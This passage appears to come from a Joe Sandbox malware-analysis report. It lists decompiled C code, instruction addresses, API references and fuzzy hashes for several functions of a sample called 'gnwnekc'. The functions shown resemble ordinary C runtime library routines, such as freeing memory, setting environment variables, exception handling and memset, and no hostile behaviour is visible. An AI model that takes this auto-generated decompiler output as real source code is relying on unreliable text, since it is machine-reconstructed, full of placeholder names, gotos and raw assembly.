							if(_t117 != 0) {
								L17:
								_v20 = _v20 - _t113 >> 1;
								_t52 = E0040802B(_t113, _v20 - _t113 >> 1);
								_v12 = _t52;
								__eflags = _t52;
								if(_t52 < 0) {
									L25:
									__eflags = _v16 - _t88;
									if(_v16 == _t88) {
										goto L41;
									} else {
										_t53 =  ~_t52;
										_v12 = _t53;
										_t27 = _t53 + 2; // 0x2
										_t99 = _t27;
										__eflags = _t99 - _t53;
										if(_t99 < _t53) {
											goto L40;
										} else {
											__eflags = _t99 - 0x3fffffff;
											if(_t99 >= 0x3fffffff) {
												goto L40;
											} else {
												_t118 = E00407C12(_t117, _t99, 4);
												E00405BB5(_t88);
												_t126 = _t126 + 0x10;
												__eflags = _t118;
												if(_t118 == 0) {
													goto L40;
												} else {
													_t100 = _v12;
													_t113 = _t88;
													_t56 = _v0;
													 *(_t118 + _t100 * 4) = _t56;
													 *(_t118 + 4 + _t100 * 4) = _t88;
													goto L30;
												}
											}
										}
									}
								} else {
									__eflags =  *_t117 - _t88;
									if( *_t117 == _t88) {
										goto L25;
									} else {
										E00405BB5( *((intOrPtr*)(_t117 + _t52 * 4)));
										_t110 = _v12;
										__eflags = _v16 - _t88;
										if(_v16 == _t88) {
											while(1) {
												__eflags =  *(_t117 + _t110 * 4) - _t88;
												if( *(_t117 + _t110 * 4) == _t88) {
													break;
												}
												_t19 = _t110 * 4; // 0x279e28
												 *(_t117 + _t110 * 4) =  *(_t117 + _t19 + 4);
												_t110 = _t110 + 1;
												__eflags = _t110;
											}
											_t118 = E00407C12(_t117, _t110, 4);
											E00405BB5(_t88);
											_t126 = _t126 + 0x10;
											_t56 = _t113;
											__eflags = _t118;
											if(_t118 != 0) {
												L30:
												 *0x416e90 = _t118;
											}
										} else {
											_t56 = _v0;
											_t113 = _t88;
											 *(_t117 + _t110 * 4) = _t56;
										}
										__eflags = _a4 - _t88;
										if(_a4 == _t88) {
											goto L41;
										} else {
											_t101 = _t56;
											_t36 = _t101 + 2; // 0x2
											_t111 = _t36;
											do {
												_t57 =  *_t101;
												_t101 = _t101 + 2;
												__eflags = _t57 - _t88;
											} while (_t57 != _t88);
											_t37 = (_t101 - _t111 >> 1) + 2; // 0x0
											_v16 = _t37;
											_t119 = E0040695A(_t37, 2);
											_pop(_t105);
											__eflags = _t119;
											if(_t119 == 0) {
												L38:
												E00405BB5(_t119);
												goto L41;
											} else {
												_t62 = E00406A05(_t119, _v16, _v0);
												__eflags = _t62;
												if(_t62 != 0) {
													_push(_t88);
													_push(_t88);
													_push(_t88);
													_push(_t88);
													_push(_t88);
													E00405C98();
													asm("int3");
													_t64 =  *0x416e90; // 0x282e58
													__eflags = _t64 -  *0x416e94; // 0x282e58
													if(__eflags == 0) {
														_push(_t64);
														_t65 = E00408083(_t88, _t105, _t113, _t119);
														 *0x416e90 = _t65;
														return _t65;
													}
													return _t64;
												} else {
													_t108 =  &(_t119[_v20 + 1]);
													 *((short*)(_t108 - 2)) = 0;
													asm("sbb eax, eax");
													__eflags = SetEnvironmentVariableW(_t119,  ~(_v24 & 0x0000ffff) & _t108);
													if(__eflags == 0) {
														_t74 = E004065F6(__eflags);
														_t88 = _t88 | 0xffffffff;
														__eflags = _t88;
														 *_t74 = 0x2a;
													}
													goto L38;
												}
											}
										}
									}
								}
							} else {
								_t79 =  *0x416e8c; // 0x0
								__eflags = _a4;
								if(_a4 == 0) {
									L10:
									__eflags = _v16 - _t88;
									if(_v16 != _t88) {
										__eflags = _t79;
										if(_t79 != 0) {
											L15:
											 *0x416e90 = E0040695A(1, 4);
											E00405BB5(_t88);
											_t126 = _t126 + 0xc;
											goto L16;
										} else {
											 *0x416e8c = E0040695A(1, 4);
											E00405BB5(_t88);
											_t126 = _t126 + 0xc;
											__eflags =  *0x416e8c - _t88; // 0x0
											if(__eflags == 0) {
												goto L40;
											} else {
												_t117 =  *0x416e90; // 0x282e58
												__eflags = _t117;
												if(_t117 != 0) {
													goto L17;
												} else {
													goto L15;
												}
											}
										}
									} else {
										_t88 = 0;
										goto L41;
									}
								} else {
									__eflags = _t79;
									if(_t79 == 0) {
										goto L10;
									} else {
										__eflags = E00402EB6();
										if(__eflags == 0) {
											goto L39;
										} else {
											L44();
											L16:
											_t117 =  *0x416e90; // 0x282e58
											__eflags = _t117;
											if(_t117 == 0) {
												L40:
												_t88 = _t87 | 0xffffffff;
												__eflags = _t88;
												L41:
												E00405BB5(_t113);
												_t49 = _t88;
												goto L42;
											} else {
												goto L17;
											}
										}
									}
								}
							}
						}
					}
				} else {
					_t85 = E004065F6(_t129);
					 *_t85 = 0x16;
					_t49 = _t85 | 0xffffffff;
					L42:
					return _t49;
				}
			}

0x00407db8
0x00407dc0
0x00407dc3
0x00407dc6
0x00407dc7
0x00407dca
0x00407dcc
0x00407de1
0x00407de2
0x00407de6
0x00407de8
0x00407ded
0x00407df2
0x00407df4
0x00407fea
0x00407fef
0x00000000
0x00407dfa
0x00407dfa
0x00407dfc
0x00000000
0x00407e02
0x00407e06
0x00407e08
0x00407e0b
0x00407e0e
0x00407e13
0x00407e19
0x00407e1b
0x00407e1d
0x00407ea8
0x00407eb3
0x00407eb6
0x00407ebb
0x00407ec0
0x00407ec2
0x00407f10
0x00407f10
0x00407f14
0x00000000
0x00407f1a
0x00407f1a
0x00407f1c
0x00407f1f
0x00407f1f
0x00407f22
0x00407f24
0x00000000
0x00407f2a
0x00407f2a
0x00407f30
0x00000000
0x00407f36
0x00407f40
0x00407f42
0x00407f47
0x00407f4a
0x00407f4c
0x00000000
0x00407f52
0x00407f52
0x00407f55
0x00407f57
0x00407f5a
0x00407f5d
0x00000000
0x00407f5d
0x00407f4c
0x00407f30
0x00407f24
0x00407ec4
0x00407ec4
0x00407ec6
0x00000000
0x00407ec8
0x00407ecb
0x00407ed1
0x00407ed4
0x00407ed8
0x00407eef
0x00407eef
0x00407ef2
0x00000000
0x00000000
0x00407ee7
0x00407eeb
0x00407eee
0x00407eee
0x00407eee
0x00407efe
0x00407f00
0x00407f05
0x00407f08
0x00407f0a
0x00407f0c
0x00407f61
0x00407f61
0x00407f61
0x00407eda
0x00407eda
0x00407edd
0x00407edf
0x00407edf
0x00407f67
0x00407f6a
0x00000000
0x00407f70
0x00407f70
0x00407f72
0x00407f72
0x00407f75
0x00407f75
0x00407f78
0x00407f7b
0x00407f7b
0x00407f86
0x00407f8a
0x00407f92
0x00407f95
0x00407f96
0x00407f98
0x00407fe1
0x00407fe2
0x00000000
0x00407f9a
0x00407fa2
0x00407faa
0x00407fac
0x00408006
0x00408007
0x00408008
0x00408009
0x0040800a
0x0040800b
0x00408010
0x00408011
0x00408016
0x0040801c
0x0040801e
0x0040801f
0x00408025
0x00000000
0x00408025
0x0040802a
0x00407fae
0x00407fb2
0x00407fb7
0x00407fc3
0x00407fcf
0x00407fd1
0x00407fd3
0x00407fd8
0x00407fd8
0x00407fdb
0x00407fdb
0x00000000
0x00407fd1
0x00407fac
0x00407f98
0x00407f6a
0x00407ec6
0x00407e23
0x00407e23
0x00407e28
0x00407e2b
0x00407e45
0x00407e45
0x00407e49
0x00407e52
0x00407e54
0x00407e83
0x00407e8d
0x00407e92
0x00407e97
0x00000000
0x00407e56
0x00407e60
0x00407e65
0x00407e6a
0x00407e6d
0x00407e73
0x00000000
0x00407e79
0x00407e79
0x00407e7f
0x00407e81
0x00000000
0x00000000
0x00000000
0x00000000
0x00407e81
0x00407e73
0x00407e4b
0x00407e4b
0x00000000
0x00407e4b
0x00407e2d
0x00407e2d
0x00407e2f
0x00000000
0x00407e31
0x00407e36
0x00407e38
0x00000000
0x00407e3e
0x00407e3e
0x00407e9a
0x00407e9a
0x00407ea0
0x00407ea2
0x00407ff5
0x00407ff5
0x00407ff5
0x00407ff8
0x00407ff9
0x00408000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ea2
0x00407e38
0x00407e2f
0x00407e2b
0x00407e1d
0x00407dfc
0x00407dce
0x00407dce
0x00407dd3
0x00407dd9
0x00408003
0x00408005
0x00408005

APIs

_free.LIBCMT ref: 00407ECB

Strings

X.(, xrefs: 00407E13, 00407E79, 00407E8D, 00407E9A, 00407F61

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: _free
String ID: X.(
API String ID: 269201875-2740717516
Opcode ID: fb69b447ea538b1def37adf9f4a6f5e1694c7fa9c57f8b41727878a8f9b7f33f
Instruction ID: 134ba89cc5276f24a0026ba9f1ee4a599761dd11adb1d3e950d2ea3f1fc808c6
Opcode Fuzzy Hash: fb69b447ea538b1def37adf9f4a6f5e1694c7fa9c57f8b41727878a8f9b7f33f
Instruction Fuzzy Hash: 7861F671E04302ABDB24AF79C841A6B77A4EF05314B15457FE905B73C1EB79BD008B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404F97 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404F97(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x40f160;
				if(_t68 != 0x40f160) {
					E00405BB5(_t68);
					_t36 = _a4;
				}
				E00405BB5( *((intOrPtr*)(_t36 + 0x3c)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x30)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x34)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x38)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x28)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x2c)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x40)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x44)));
				E00405BB5( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00405110(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E0040517B(_t67, _t72, _t73, _t77);
			}

0x00404f97
0x00404f97
0x00404f97
0x00404f9c
0x00404fa2
0x00404fa4
0x00404faa
0x00404fad
0x00404fb2
0x00404fb5
0x00404fb9
0x00404fc4
0x00404fcf
0x00404fda
0x00404fe5
0x00404ff0
0x00404ffb
0x00405006
0x00405014
0x0040501f
0x00405027
0x00405028
0x0040502b
0x00405031
0x00405035
0x00405039
0x0040503a
0x00405044
0x0040504a
0x0040504b
0x0040504e
0x00405054
0x00405058
0x0040505c
0x00405063

APIs

_free.LIBCMT ref: 00404FAD

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

_free.LIBCMT ref: 00404FB9
_free.LIBCMT ref: 00404FC4
_free.LIBCMT ref: 00404FCF
_free.LIBCMT ref: 00404FDA
_free.LIBCMT ref: 00404FE5
_free.LIBCMT ref: 00404FF0
_free.LIBCMT ref: 00404FFB
_free.LIBCMT ref: 00405006
_free.LIBCMT ref: 00405014

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e4755dc35d0587d11df3447b5287aa04db529ff31c4f5408fe4a0a857521b5a6
Instruction ID: 843b32a356185fe84c4253f2742a9aae9ce8256b5c03ab8ee691aa6bbde78eba
Opcode Fuzzy Hash: e4755dc35d0587d11df3447b5287aa04db529ff31c4f5408fe4a0a857521b5a6
Instruction Fuzzy Hash: 1921BB76900508AFDB11EF95C881DDE7BB4EF08344B0041AAB515AB2A1EBB5FB44CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00401F00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00401F00(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed char _v36;
				void* _v40;
				signed int _t77;
				signed int _t84;
				intOrPtr _t85;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr _t89;
				signed int _t91;
				int _t93;
				signed int _t98;
				intOrPtr* _t102;
				intOrPtr _t103;
				signed int _t107;
				char _t109;
				signed int _t113;
				void* _t114;
				intOrPtr _t123;
				void* _t125;
				intOrPtr _t133;
				signed int _t135;
				void* _t139;
				void* _t141;
				void* _t149;

				_t118 = __edx;
				_t102 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t102 = E0040EA23(__ecx,  *_t102);
				_t103 = _a8;
				_t6 = _t103 + 0x10; // 0x11
				_t133 = _t6;
				_push(_t133);
				_v20 = _t133;
				_v12 =  *(_t103 + 8) ^  *0x416010;
				E00401EC0(_t103, __edx, __edi, _t133,  *(_t103 + 8) ^  *0x416010);
				E004046E7(_a12);
				_t77 = _a4;
				_t141 = _t139 - 0x1c + 0x10;
				_t123 =  *((intOrPtr*)(_t103 + 0xc));
				if(( *(_t77 + 4) & 0x00000066) != 0) {
					__eflags = _t123 - 0xfffffffe;
					if(_t123 != 0xfffffffe) {
						_t118 = 0xfffffffe;
						E004046D0(_t103, 0xfffffffe, _t133, 0x416010);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t77;
					_v28 = _a12;
					 *((intOrPtr*)(_t103 - 4)) =  &_v32;
					if(_t123 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t107 = _v12;
							_t84 = _t123 + (_t123 + 2) * 2;
							_t103 =  *((intOrPtr*)(_t107 + _t84 * 4));
							_t85 = _t107 + _t84 * 4;
							_t108 =  *((intOrPtr*)(_t85 + 4));
							_v24 = _t85;
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t109 = _v5;
								goto L7;
							} else {
								_t118 = _t133;
								_t86 = E00404670(_t108, _t133);
								_t109 = 1;
								_v5 = 1;
								_t149 = _t86;
								if(_t149 < 0) {
									_v16 = 0;
									L13:
									_push(_t133);
									E00401EC0(_t103, _t118, _t123, _t133, _v12);
									goto L14;
								} else {
									if(_t149 > 0) {
										_t87 = _a4;
										__eflags =  *_t87 - 0xe06d7363;
										if( *_t87 == 0xe06d7363) {
											__eflags =  *0x40f0d8;
											if(__eflags != 0) {
												_t98 = E004044C0(__eflags, 0x40f0d8);
												_t141 = _t141 + 4;
												__eflags = _t98;
												if(_t98 != 0) {
													_t135 =  *0x40f0d8; // 0x401d65
													 *0x418000(_a4, 1);
													 *_t135();
													_t133 = _v20;
													_t141 = _t141 + 8;
												}
												_t87 = _a4;
											}
										}
										_t119 = _t87;
										E004046B0(_t87, _a8, _t87);
										_t89 = _a8;
										__eflags =  *((intOrPtr*)(_t89 + 0xc)) - _t123;
										if( *((intOrPtr*)(_t89 + 0xc)) != _t123) {
											_t119 = _t123;
											E004046D0(_t89, _t123, _t133, 0x416010);
											_t89 = _a8;
										}
										_push(_t133);
										 *((intOrPtr*)(_t89 + 0xc)) = _t103;
										E00401EC0(_t103, _t119, _t123, _t133, _v12);
										E00404690();
										asm("int3");
										asm("int3");
										asm("int3");
										_t113 = _v32;
										_t91 = _v36 & 0x000000ff;
										_t125 = _v40;
										__eflags = _t113;
										if(_t113 == 0) {
											L46:
											return _v40;
										} else {
											_t93 = _t91 * 0x1010101;
											__eflags = _t113 - 0x20;
											if(_t113 <= 0x20) {
												L39:
												__eflags = _t113 & 0x00000003;
												while((_t113 & 0x00000003) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 1;
													_t113 = _t113 - 1;
													__eflags = _t113 & 0x00000003;
												}
												__eflags = _t113 & 0x00000004;
												if((_t113 & 0x00000004) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 4;
													_t113 = _t113 - 4;
													__eflags = _t113;
												}
												__eflags = _t113 & 0xfffffff8;
												while((_t113 & 0xfffffff8) != 0) {
													 *_t125 = _t93;
													 *(_t125 + 4) = _t93;
													_t125 = _t125 + 8;
													_t113 = _t113 - 8;
													__eflags = _t113 & 0xfffffff8;
												}
												goto L46;
											} else {
												__eflags = _t113 - 0x80;
												if(__eflags < 0) {
													L33:
													asm("bt dword [0x416018], 0x1");
													if(__eflags >= 0) {
														goto L39;
													} else {
														asm("movd xmm0, eax");
														asm("pshufd xmm0, xmm0, 0x0");
														goto L35;
													}
												} else {
													asm("bt dword [0x416904], 0x1");
													if(__eflags >= 0) {
														asm("bt dword [0x416018], 0x1");
														if(__eflags >= 0) {
															goto L39;
														} else {
															asm("movd xmm0, eax");
															asm("pshufd xmm0, xmm0, 0x0");
															_t114 = _t125 + _t113;
															asm("movups [edi], xmm0");
															_t125 = _t125 + 0x00000010 & 0xfffffff0;
															_t113 = _t114 - _t125;
															__eflags = _t113 - 0x80;
															if(__eflags <= 0) {
																goto L33;
															} else {
																do {
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm0");
																	asm("movdqa [edi+0x20], xmm0");
																	asm("movdqa [edi+0x30], xmm0");
																	asm("movdqa [edi+0x40], xmm0");
																	asm("movdqa [edi+0x50], xmm0");
																	asm("movdqa [edi+0x60], xmm0");
																	asm("movdqa [edi+0x70], xmm0");
																	_t125 = _t125 + 0x80;
																	_t113 = _t113 - 0x80;
																	__eflags = _t113 & 0xffffff00;
																} while ((_t113 & 0xffffff00) != 0);
																L35:
																__eflags = _t113 - 0x20;
																if(_t113 < 0x20) {
																	L38:
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm0");
																	return _v40;
																} else {
																	do {
																		asm("movdqu [edi], xmm0");
																		asm("movdqu [edi+0x10], xmm0");
																		_t125 = _t125 + 0x20;
																		_t113 = _t113 - 0x20;
																		__eflags = _t113 - 0x20;
																	} while (_t113 >= 0x20);
																	__eflags = _t113 & 0x0000001f;
																	if((_t113 & 0x0000001f) == 0) {
																		goto L46;
																	} else {
																		goto L38;
																	}
																}
															}
														}
													} else {
														memset(_t125, _t93, _t113 << 0);
														return _v40;
													}
												}
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L47;
							L7:
							_t123 = _t103;
						} while (_t103 != 0xfffffffe);
						if(_t109 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L47:
			}

0x00401f00
0x00401f07
0x00401f0b
0x00401f0c
0x00401f12
0x00401f1e
0x00401f20
0x00401f26
0x00401f26
0x00401f2f
0x00401f31
0x00401f34
0x00401f37
0x00401f3f
0x00401f44
0x00401f47
0x00401f4a
0x00401f51
0x00401fad
0x00401fb0
0x00401fb8
0x00401fbf
0x00000000
0x00401fbf
0x00000000
0x00401f53
0x00401f53
0x00401f59
0x00401f5f
0x00401f65
0x00401fd0
0x00401fd9
0x00401f67
0x00401f67
0x00401f67
0x00401f6d
0x00401f70
0x00401f73
0x00401f76
0x00401f79
0x00401f7e
0x00401f94
0x00000000
0x00401f80
0x00401f80
0x00401f82
0x00401f87
0x00401f89
0x00401f8c
0x00401f8e
0x00401fa4
0x00401fc4
0x00401fc4
0x00401fc8
0x00000000
0x00401f90
0x00401f90
0x00401fda
0x00401fdd
0x00401fe3
0x00401fe5
0x00401fec
0x00401ff3
0x00401ff8
0x00401ffb
0x00401ffd
0x00401fff
0x0040200c
0x00402012
0x00402014
0x00402017
0x00402017
0x0040201a
0x0040201a
0x00401fec
0x00402020
0x00402022
0x00402027
0x0040202a
0x0040202d
0x00402035
0x00402039
0x0040203e
0x0040203e
0x00402041
0x00402045
0x00402048
0x00402058
0x0040205d
0x0040205e
0x0040205f
0x00402060
0x00402064
0x0040206b
0x0040206f
0x00402071
0x004021b3
0x004021b9
0x00402077
0x00402077
0x0040207d
0x00402080
0x00402165
0x00402165
0x0040216b
0x0040216d
0x0040216f
0x00402170
0x00402173
0x00402173
0x0040217b
0x00402181
0x00402183
0x00402185
0x00402188
0x00402188
0x00402188
0x0040218b
0x00402191
0x004021a0
0x004021a2
0x004021a5
0x004021a8
0x004021ab
0x004021ab
0x00000000
0x00402086
0x00402086
0x0040208c
0x0040211d
0x0040211d
0x00402125
0x00000000
0x00402127
0x00402127
0x0040212b
0x00000000
0x0040212b
0x00402092
0x00402092
0x0040209a
0x004020a5
0x004020ad
0x00000000
0x004020b3
0x004020b3
0x004020b7
0x004020bc
0x004020be
0x004020c4
0x004020c7
0x004020c9
0x004020cf
0x00000000
0x004020e0
0x004020e0
0x004020e0
0x004020e4
0x004020e9
0x004020ee
0x004020f3
0x004020f8
0x004020fd
0x00402102
0x00402107
0x0040210d
0x00402113
0x00402113
0x00402130
0x00402130
0x00402133
0x00402151
0x00402155
0x00402159
0x00402164
0x00402135
0x00402135
0x00402135
0x00402139
0x0040213e
0x00402141
0x00402144
0x00402144
0x00402149
0x0040214f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040214f
0x00402133
0x004020cf
0x0040209c
0x0040209c
0x004020a4
0x004020a4
0x0040209a
0x0040208c
0x00402080
0x00401f92
0x00000000
0x00401f92
0x00401f90
0x00401f8e
0x00000000
0x00401f97
0x00401f97
0x00401f99
0x00401fa0
0x00000000
0x00401fa2
0x00000000
0x00401fa0
0x00401f65
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00401F37
___except_validate_context_record.LIBVCRUNTIME ref: 00401F3F
_ValidateLocalCookies.LIBCMT ref: 00401FC8
__IsNonwritableInCurrentImage.LIBCMT ref: 00401FF3
_ValidateLocalCookies.LIBCMT ref: 00402048

Strings

csm, xrefs: 00401FDD

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 89ac16e3ccc6b6114ceb04cb8a96fe4a5eb338c79980748b098c818dde7718e7
Instruction ID: d975cb5476b3c8af4e7753ab6fd4a005e227c658bb3f8fa2d0127e1d8b4058f0
Opcode Fuzzy Hash: 89ac16e3ccc6b6114ceb04cb8a96fe4a5eb338c79980748b098c818dde7718e7
Instruction Fuzzy Hash: D141E434A002099BCF10DF69C884A9E7BB1AF45318F14847AF914BB3E2D779E915CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040681A Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040681A(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E004068FE(_t45, 7);
					E004068FE(_t45 + 0x1c, 7);
					E004068FE(_t45 + 0x38, 0xc);
					E004068FE(_t45 + 0x68, 0xc);
					E004068FE(_t45 + 0x98, 2);
					E00405BB5( *((intOrPtr*)(_t45 + 0xa0)));
					E00405BB5( *((intOrPtr*)(_t45 + 0xa4)));
					E00405BB5( *((intOrPtr*)(_t45 + 0xa8)));
					E004068FE(_t45 + 0xb4, 7);
					E004068FE(_t45 + 0xd0, 7);
					E004068FE(_t45 + 0xec, 0xc);
					E004068FE(_t45 + 0x11c, 0xc);
					E004068FE(_t45 + 0x14c, 2);
					E00405BB5( *((intOrPtr*)(_t45 + 0x154)));
					E00405BB5( *((intOrPtr*)(_t45 + 0x158)));
					E00405BB5( *((intOrPtr*)(_t45 + 0x15c)));
					return E00405BB5( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00406820
0x00406825
0x0040682e
0x00406839
0x00406844
0x0040684f
0x0040685d
0x00406868
0x00406873
0x0040687e
0x0040688c
0x0040689a
0x004068ab
0x004068b9
0x004068c7
0x004068d2
0x004068dd
0x004068e8
0x00000000
0x004068f8
0x004068fd

APIs

Part of subcall function 004068FE: _free.LIBCMT ref: 00406923

_free.LIBCMT ref: 00406868

Part of subcall function 00405BB5: HeapFree.KERNEL32(00000000,00000000), ref: 00405BCB
Part of subcall function 00405BB5: GetLastError.KERNEL32(?,?,00406928,?,00000000,?,?,?,00406833,?,00000007,?,?,004071D4,?,?), ref: 00405BDD

_free.LIBCMT ref: 00406873
_free.LIBCMT ref: 0040687E
_free.LIBCMT ref: 004068D2
_free.LIBCMT ref: 004068DD
_free.LIBCMT ref: 004068E8
_free.LIBCMT ref: 004068F3

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 220fc9b63bbb487eddf950a848d7cfc59285a1d61a2781ac85f7cdbba02dc7e0
Instruction ID: 9a5947df7f2f7171008d3c83b437674f844d4a09c051de9a8661a7ac415e416a
Opcode Fuzzy Hash: 220fc9b63bbb487eddf950a848d7cfc59285a1d61a2781ac85f7cdbba02dc7e0
Instruction Fuzzy Hash: 44115132542B04B6E931BBB1CC0AFC777AC9F00704F41483EB29A760E2EABCB5255B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8DF Relevance: 9.3, APIs: 6, Instructions: 318
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E0040A8DF(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x416010; // 0x2fe432c7
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x417158 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E00405421( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
